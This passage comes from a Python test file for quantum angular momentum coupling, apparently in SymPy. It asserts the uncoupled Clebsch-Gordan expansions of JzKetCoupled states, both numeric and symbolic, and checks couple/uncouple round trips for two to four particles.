)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)
)
/ 6
)
assert (
uncouple(
JzKetCoupled(
2, 0, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 2))
)
)
== -TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 2
- TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 2
+ TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)
)
/ 2
+ TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)
)
/ 2
)
assert (
uncouple(
JzKetCoupled(
2, -1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 2))
)
)
== -sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 6
- sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 3
- sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 0),
)
/ 12
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, -1),
)
/ 12
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 12
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 12
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)
)
/ 3
)
assert (
uncouple(
JzKetCoupled(
2, -2, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 2))
)
)
== -sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 6
- sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, -1),
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, -1),
)
/ 3
)
assert (
uncouple(
JzKetCoupled(
1, 1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 1))
)
)
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 5
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 1),
)
/ 20
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 0),
)
/ 20
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 20
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 20
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)
)
/ 30
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)
)
/ 30
)
assert (
uncouple(
JzKetCoupled(
1, 0, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 1))
)
)
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 10
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 10
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 1),
)
/ 30
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 0),
)
/ 15
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, -1),
)
/ 30
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 30
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 15
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 30
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)
)
/ 10
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)
)
/ 10
)
assert (
uncouple(
JzKetCoupled(
1, -1, (S.Half, S.Half, 1, 1), ((1, 2, 1), (3, 4, 2), (1, 3, 1))
)
)
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 30
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 30
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 0),
)
/ 20
- sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, -1),
)
/ 20
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 0),
)
/ 20
- sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, -1),
)
/ 20
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)
)
/ 5
)


def test_uncouple_symbolic():
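    # Symbolic j and m: uncoupling cannot be evaluated numerically, so the
    # result is a Sum over the m_i of products of CG coefficients and tensor
    # products of JzKet states.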
assert uncouple(JzKetCoupled(j, m, (j1, j2))) == Sum(
CG(j1, m1, j2, m2, j, m) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2)),
(m1, -j1, j1),
(m2, -j2, j2),
)
assert uncouple(JzKetCoupled(j, m, (j1, j2, j3))) == Sum(
CG(j1, m1, j2, m2, j1 + j2, m1 + m2)
* CG(j1 + j2, m1 + m2, j3, m3, j, m)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2), JzKet(j3, m3)),
(m1, -j1, j1),
(m2, -j2, j2),
(m3, -j3, j3),
)
assert uncouple(JzKetCoupled(j, m, (j1, j2, j3), ((1, 3, j13), (1, 2, j)))) == Sum(
CG(j1, m1, j3, m3, j13, m1 + m3)
* CG(j13, m1 + m3, j2, m2, j, m)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2), JzKet(j3, m3)),
(m1, -j1, j1),
(m2, -j2, j2),
(m3, -j3, j3),
)
assert uncouple(JzKetCoupled(j, m, (j1, j2, j3, j4))) == Sum(
CG(j1, m1, j2, m2, j1 + j2, m1 + m2)
* CG(j1 + j2, m1 + m2, j3, m3, j1 + j2 + j3, m1 + m2 + m3)
* CG(j1 + j2 + j3, m1 + m2 + m3, j4, m4, j, m)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2), JzKet(j3, m3), JzKet(j4, m4)),
(m1, -j1, j1),
(m2, -j2, j2),
(m3, -j3, j3),
(m4, -j4, j4),
)
assert uncouple(
JzKetCoupled(j, m, (j1, j2, j3, j4), ((1, 3, j13), (2, 4, j24), (1, 2, j)))
) == Sum(
CG(j1, m1, j3, m3, j13, m1 + m3)
* CG(j2, m2, j4, m4, j24, m2 + m4)
* CG(j13, m1 + m3, j24, m2 + m4, j, m)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2), JzKet(j3, m3), JzKet(j4, m4)),
(m1, -j1, j1),
(m2, -j2, j2),
(m3, -j3, j3),
(m4, -j4, j4),
)


def test_couple_2_states():
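    # Round trip: coupling the uncoupled form of a two-particle coupled state
    # should reproduce the original JzKetCoupled state.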
# j1=1/2, j2=1/2
assert JzKetCoupled(0, 0, (S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(0, 0, (S.Half, S.Half))))
)
assert JzKetCoupled(1, 1, (S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(1, 1, (S.Half, S.Half))))
)
assert JzKetCoupled(1, 0, (S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(1, 0, (S.Half, S.Half))))
)
assert JzKetCoupled(1, -1, (S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(1, -1, (S.Half, S.Half))))
)
# j1=1, j2=1/2
assert JzKetCoupled(S.Half, S.Half, (1, S.Half)) == expand(
couple(uncouple(JzKetCoupled(S.Half, S.Half, (1, S.Half))))
)
assert JzKetCoupled(S.Half, Rational(-1, 2), (1, S.Half)) == expand(
couple(uncouple(JzKetCoupled(S.Half, Rational(-1, 2), (1, S.Half))))
)
assert JzKetCoupled(Rational(3, 2), Rational(3, 2), (1, S.Half)) == expand(
couple(uncouple(JzKetCoupled(Rational(3, 2), Rational(3, 2), (1, S.Half))))
)
assert JzKetCoupled(Rational(3, 2), S.Half, (1, S.Half)) == expand(
couple(uncouple(JzKetCoupled(Rational(3, 2), S.Half, (1, S.Half))))
)
assert JzKetCoupled(Rational(3, 2), Rational(-1, 2), (1, S.Half)) == expand(
couple(uncouple(JzKetCoupled(Rational(3, 2), Rational(-1, 2), (1, S.Half))))
)
assert JzKetCoupled(Rational(3, 2), Rational(-3, 2), (1, S.Half)) == expand(
couple(uncouple(JzKetCoupled(Rational(3, 2), Rational(-3, 2), (1, S.Half))))
)
# j1=1, j2=1
assert JzKetCoupled(0, 0, (1, 1)) == expand(
couple(uncouple(JzKetCoupled(0, 0, (1, 1))))
)
assert JzKetCoupled(1, 1, (1, 1)) == expand(
couple(uncouple(JzKetCoupled(1, 1, (1, 1))))
)
assert JzKetCoupled(1, 0, (1, 1)) == expand(
couple(uncouple(JzKetCoupled(1, 0, (1, 1))))
)
assert JzKetCoupled(1, -1, (1, 1)) == expand(
couple(uncouple(JzKetCoupled(1, -1, (1, 1))))
)
assert JzKetCoupled(2, 2, (1, 1)) == expand(
couple(uncouple(JzKetCoupled(2, 2, (1, 1))))
)
assert JzKetCoupled(2, 1, (1, 1)) == expand(
couple(uncouple(JzKetCoupled(2, 1, (1, 1))))
)
assert JzKetCoupled(2, 0, (1, 1)) == expand(
couple(uncouple(JzKetCoupled(2, 0, (1, 1))))
)
assert JzKetCoupled(2, -1, (1, 1)) == expand(
couple(uncouple(JzKetCoupled(2, -1, (1, 1))))
)
assert JzKetCoupled(2, -2, (1, 1)) == expand(
couple(uncouple(JzKetCoupled(2, -2, (1, 1))))
)
# j1=1/2, j2=3/2
assert JzKetCoupled(1, 1, (S.Half, Rational(3, 2))) == expand(
couple(uncouple(JzKetCoupled(1, 1, (S.Half, Rational(3, 2)))))
)
assert JzKetCoupled(1, 0, (S.Half, Rational(3, 2))) == expand(
couple(uncouple(JzKetCoupled(1, 0, (S.Half, Rational(3, 2)))))
)
assert JzKetCoupled(1, -1, (S.Half, Rational(3, 2))) == expand(
couple(uncouple(JzKetCoupled(1, -1, (S.Half, Rational(3, 2)))))
)
assert JzKetCoupled(2, 2, (S.Half, Rational(3, 2))) == expand(
couple(uncouple(JzKetCoupled(2, 2, (S.Half, Rational(3, 2)))))
)
assert JzKetCoupled(2, 1, (S.Half, Rational(3, 2))) == expand(
couple(uncouple(JzKetCoupled(2, 1, (S.Half, Rational(3, 2)))))
)
assert JzKetCoupled(2, 0, (S.Half, Rational(3, 2))) == expand(
couple(uncouple(JzKetCoupled(2, 0, (S.Half, Rational(3, 2)))))
)
assert JzKetCoupled(2, -1, (S.Half, Rational(3, 2))) == expand(
couple(uncouple(JzKetCoupled(2, -1, (S.Half, Rational(3, 2)))))
)
assert JzKetCoupled(2, -2, (S.Half, Rational(3, 2))) == expand(
couple(uncouple(JzKetCoupled(2, -2, (S.Half, Rational(3, 2)))))
)


def test_couple_3_states():
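    # Round trip for three-particle states, for the default coupling order and
    # for the explicit j1+j3=j13, j13+j2=j order.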
# Default coupling
# j1=1/2, j2=1/2, j3=1/2
assert JzKetCoupled(S.Half, S.Half, (S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(S.Half, S.Half, (S.Half, S.Half, S.Half))))
)
assert JzKetCoupled(S.Half, Rational(-1, 2), (S.Half, S.Half, S.Half)) == expand(
couple(
uncouple(JzKetCoupled(S.Half, Rational(-1, 2), (S.Half, S.Half, S.Half)))
)
)
assert JzKetCoupled(
Rational(3, 2), Rational(3, 2), (S.Half, S.Half, S.Half)
) == expand(
couple(
uncouple(
JzKetCoupled(Rational(3, 2), Rational(3, 2), (S.Half, S.Half, S.Half))
)
)
)
assert JzKetCoupled(Rational(3, 2), S.Half, (S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(Rational(3, 2), S.Half, (S.Half, S.Half, S.Half))))
)
assert JzKetCoupled(
Rational(3, 2), Rational(-1, 2), (S.Half, S.Half, S.Half)
) == expand(
couple(
uncouple(
JzKetCoupled(Rational(3, 2), Rational(-1, 2), (S.Half, S.Half, S.Half))
)
)
)
assert JzKetCoupled(
Rational(3, 2), Rational(-3, 2), (S.Half, S.Half, S.Half)
) == expand(
couple(
uncouple(
JzKetCoupled(Rational(3, 2), Rational(-3, 2), (S.Half, S.Half, S.Half))
)
)
)
# j1=1/2, j2=1/2, j3=1
assert JzKetCoupled(0, 0, (S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(0, 0, (S.Half, S.Half, 1))))
)
assert JzKetCoupled(1, 1, (S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(1, 1, (S.Half, S.Half, 1))))
)
assert JzKetCoupled(1, 0, (S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(1, 0, (S.Half, S.Half, 1))))
)
assert JzKetCoupled(1, -1, (S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(1, -1, (S.Half, S.Half, 1))))
)
assert JzKetCoupled(2, 2, (S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(2, 2, (S.Half, S.Half, 1))))
)
assert JzKetCoupled(2, 1, (S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(2, 1, (S.Half, S.Half, 1))))
)
assert JzKetCoupled(2, 0, (S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(2, 0, (S.Half, S.Half, 1))))
)
assert JzKetCoupled(2, -1, (S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(2, -1, (S.Half, S.Half, 1))))
)
assert JzKetCoupled(2, -2, (S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(2, -2, (S.Half, S.Half, 1))))
)
# Couple j1+j3=j13, j13+j2=j
# j1=1/2, j2=1/2, j3=1/2, j13=0
assert JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 3, 0), (1, 2, S.Half))
) == expand(
couple(
uncouple(
JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half),
((1, 3, 0), (1, 2, S.Half)),
)
),
((1, 3), (1, 2)),
)
)
assert JzKetCoupled(
S.Half, Rational(-1, 2), (S.Half, S.Half, S.Half), ((1, 3, 0), (1, 2, S.Half))
) == expand(
couple(
uncouple(
JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 3, 0), (1, 2, S.Half)),
)
),
((1, 3), (1, 2)),
)
)
# j1=1, j2=1/2, j3=1, j13=1
assert JzKetCoupled(
S.Half, S.Half, (1, S.Half, 1), ((1, 3, 1), (1, 2, S.Half))
) == expand(
couple(
uncouple(
JzKetCoupled(
S.Half, S.Half, (1, S.Half, 1), ((1, 3, 1), (1, 2, S.Half))
)
),
((1, 3), (1, 2)),
)
)
assert JzKetCoupled(
S.Half, Rational(-1, 2), (1, S.Half, 1), ((1, 3, 1), (1, 2, S.Half))
) == expand(
couple(
uncouple(
JzKetCoupled(
S.Half, Rational(-1, 2), (1, S.Half, 1), ((1, 3, 1), (1, 2, S.Half))
)
),
((1, 3), (1, 2)),
)
)
assert JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(1, S.Half, 1),
((1, 3, 1), (1, 2, Rational(3, 2))),
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(1, S.Half, 1),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
),
((1, 3), (1, 2)),
)
)
assert JzKetCoupled(
Rational(3, 2), S.Half, (1, S.Half, 1), ((1, 3, 1), (1, 2, Rational(3, 2)))
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2),
S.Half,
(1, S.Half, 1),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
),
((1, 3), (1, 2)),
)
)
assert JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(1, S.Half, 1),
((1, 3, 1), (1, 2, Rational(3, 2))),
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(1, S.Half, 1),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
),
((1, 3), (1, 2)),
)
)
assert JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(1, S.Half, 1),
((1, 3, 1), (1, 2, Rational(3, 2))),
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(1, S.Half, 1),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
),
((1, 3), (1, 2)),
)
)


def test_couple_4_states():
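    # Round trip for four-particle states, including non-default coupling
    # orders such as j1+j3=j13, j2+j4=j24, j13+j24=j.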
# Default coupling
# j1=1/2, j2=1/2, j3=1/2, j4=1/2
assert JzKetCoupled(1, 1, (S.Half, S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(1, 1, (S.Half, S.Half, S.Half, S.Half))))
)
assert JzKetCoupled(1, 0, (S.Half, S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(1, 0, (S.Half, S.Half, S.Half, S.Half))))
)
assert JzKetCoupled(1, -1, (S.Half, S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(1, -1, (S.Half, S.Half, S.Half, S.Half))))
)
assert JzKetCoupled(2, 2, (S.Half, S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(2, 2, (S.Half, S.Half, S.Half, S.Half))))
)
assert JzKetCoupled(2, 1, (S.Half, S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(2, 1, (S.Half, S.Half, S.Half, S.Half))))
)
assert JzKetCoupled(2, 0, (S.Half, S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(2, 0, (S.Half, S.Half, S.Half, S.Half))))
)
assert JzKetCoupled(2, -1, (S.Half, S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(2, -1, (S.Half, S.Half, S.Half, S.Half))))
)
assert JzKetCoupled(2, -2, (S.Half, S.Half, S.Half, S.Half)) == expand(
couple(uncouple(JzKetCoupled(2, -2, (S.Half, S.Half, S.Half, S.Half))))
)
# j1=1/2, j2=1/2, j3=1/2, j4=1
assert JzKetCoupled(S.Half, S.Half, (S.Half, S.Half, S.Half, 1)) == expand(
couple(uncouple(JzKetCoupled(S.Half, S.Half, (S.Half, S.Half, S.Half, 1))))
)
assert JzKetCoupled(S.Half, Rational(-1, 2), (S.Half, S.Half, S.Half, 1)) == expand(
couple(
uncouple(JzKetCoupled(S.Half, Rational(-1, 2), (S.Half, S.Half, S.Half, 1)))
)
)
assert JzKetCoupled(
Rational(3, 2), Rational(3, 2), (S.Half, S.Half, S.Half, 1)
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2), Rational(3, 2), (S.Half, S.Half, S.Half, 1)
)
)
)
)
assert JzKetCoupled(Rational(3, 2), S.Half, (S.Half, S.Half, S.Half, 1)) == expand(
couple(
uncouple(JzKetCoupled(Rational(3, 2), S.Half, (S.Half, S.Half, S.Half, 1)))
)
)
assert JzKetCoupled(
Rational(3, 2), Rational(-1, 2), (S.Half, S.Half, S.Half, 1)
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2), Rational(-1, 2), (S.Half, S.Half, S.Half, 1)
)
)
)
)
assert JzKetCoupled(
Rational(3, 2), Rational(-3, 2), (S.Half, S.Half, S.Half, 1)
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2), Rational(-3, 2), (S.Half, S.Half, S.Half, 1)
)
)
)
)
assert JzKetCoupled(
Rational(5, 2), Rational(5, 2), (S.Half, S.Half, S.Half, 1)
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(5, 2), Rational(5, 2), (S.Half, S.Half, S.Half, 1)
)
)
)
)
assert JzKetCoupled(
Rational(5, 2), Rational(3, 2), (S.Half, S.Half, S.Half, 1)
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(5, 2), Rational(3, 2), (S.Half, S.Half, S.Half, 1)
)
)
)
)
assert JzKetCoupled(Rational(5, 2), S.Half, (S.Half, S.Half, S.Half, 1)) == expand(
couple(
uncouple(JzKetCoupled(Rational(5, 2), S.Half, (S.Half, S.Half, S.Half, 1)))
)
)
assert JzKetCoupled(
Rational(5, 2), Rational(-1, 2), (S.Half, S.Half, S.Half, 1)
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(5, 2), Rational(-1, 2), (S.Half, S.Half, S.Half, 1)
)
)
)
)
assert JzKetCoupled(
Rational(5, 2), Rational(-3, 2), (S.Half, S.Half, S.Half, 1)
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(5, 2), Rational(-3, 2), (S.Half, S.Half, S.Half, 1)
)
)
)
)
assert JzKetCoupled(
Rational(5, 2), Rational(-5, 2), (S.Half, S.Half, S.Half, 1)
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(5, 2), Rational(-5, 2), (S.Half, S.Half, S.Half, 1)
)
)
)
)
# Coupling j1+j3=j13, j2+j4=j24, j13+j24=j
# j1=1/2, j2=1/2, j3=1/2, j4=1/2, j13=1, j24=0
assert JzKetCoupled(
1, 1, (S.Half, S.Half, S.Half, S.Half), ((1, 3, 1), (2, 4, 0), (1, 2, 1))
) == expand(
couple(
uncouple(
JzKetCoupled(
1,
1,
(S.Half, S.Half, S.Half, S.Half),
((1, 3, 1), (2, 4, 0), (1, 2, 1)),
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 3, 1), (2, 4, 0), (1, 2, 1))
) == expand(
couple(
uncouple(
JzKetCoupled(
1,
0,
(S.Half, S.Half, S.Half, S.Half),
((1, 3, 1), (2, 4, 0), (1, 2, 1)),
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
1, -1, (S.Half, S.Half, S.Half, S.Half), ((1, 3, 1), (2, 4, 0), (1, 2, 1))
) == expand(
couple(
uncouple(
JzKetCoupled(
1,
-1,
(S.Half, S.Half, S.Half, S.Half),
((1, 3, 1), (2, 4, 0), (1, 2, 1)),
)
),
((1, 3), (2, 4), (1, 2)),
)
)
# j1=1/2, j2=1/2, j3=1/2, j4=1, j13=1, j24=1/2
assert JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, S.Half)),
) == expand(
couple(
uncouple(
JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, S.Half)),
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, S.Half)),
) == expand(
couple(
uncouple(
JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, S.Half)),
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, Rational(3, 2))),
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, Rational(3, 2))),
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, Rational(3, 2))),
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, Rational(3, 2))),
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, Rational(3, 2))),
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, Rational(3, 2))),
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, Rational(3, 2))),
) == expand(
couple(
uncouple(
JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 3, 1), (2, 4, S.Half), (1, 2, Rational(3, 2))),
)
),
((1, 3), (2, 4), (1, 2)),
)
)
# j1=1/2, j2=1, j3=1/2, j4=1, j13=0, j24=1
assert JzKetCoupled(
1, 1, (S.Half, 1, S.Half, 1), ((1, 3, 0), (2, 4, 1), (1, 2, 1))
) == expand(
couple(
uncouple(
JzKetCoupled(
1, 1, (S.Half, 1, S.Half, 1), ((1, 3, 0), (2, 4, 1), (1, 2, 1))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
1, 0, (S.Half, 1, S.Half, 1), ((1, 3, 0), (2, 4, 1), (1, 2, 1))
) == expand(
couple(
uncouple(
JzKetCoupled(
1, 0, (S.Half, 1, S.Half, 1), ((1, 3, 0), (2, 4, 1), (1, 2, 1))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
assert JzKetCoupled(
1, -1, (S.Half, 1, S.Half, 1), ((1, 3, 0), (2, 4, 1), (1, 2, 1))
) == expand(
couple(
uncouple(
JzKetCoupled(
1, -1, (S.Half, 1, S.Half, 1), ((1, 3, 0), (2, 4, 1), (1, 2, 1))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
# j1=1/2, j2=1, j3=1/2, j4=1, j13=1, j24=1
assert JzKetCoupled(
0, 0, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 0))
) == expand(
couple(
uncouple(
JzKetCoupled(
0, 0, (S.Half, 1, S.Half, 1), ((1, 3, 1), (2, 4, 1), (1, 2, 0))
)
),
((1, 3), (2, 4), (1, 2)),
)
)
